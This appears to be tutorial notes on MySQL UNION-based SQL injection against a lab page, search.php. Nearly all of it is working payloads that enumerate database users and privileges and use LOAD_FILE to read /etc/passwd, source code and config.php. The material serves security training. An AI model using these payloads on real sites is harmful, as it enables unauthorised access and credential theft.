Reading Files

DB User

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

Our UNION injection payload will be as follows:

cn' UNION SELECT 1, user(), 3, 4-- -
##or
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -

Which tells us our current user, which in this case is root:

User Privileges

SELECT super_priv FROM mysql.user

Once again, we can use the following payload with the above query:

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -

If we had many users within the DBMS, we can add WHERE user="root" to only show privileges for our current user root:

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

The query returns Y, which means YES, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:

cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -

From here, we can add WHERE grantee="'root'@'localhost'" to only show our current user root privileges. Our payload would be:

cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

And we see all of the possible privileges given to our current user:

LOAD_FILE

SELECT LOAD_FILE('/etc/passwd');

Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.

Similar to how we have been using a UNION injection, we can use the above query:

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Another Example

We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting [Ctrl + U]

' UNION SELECT 1, load_file('/var/www/html/config.php'), 3, 4-- -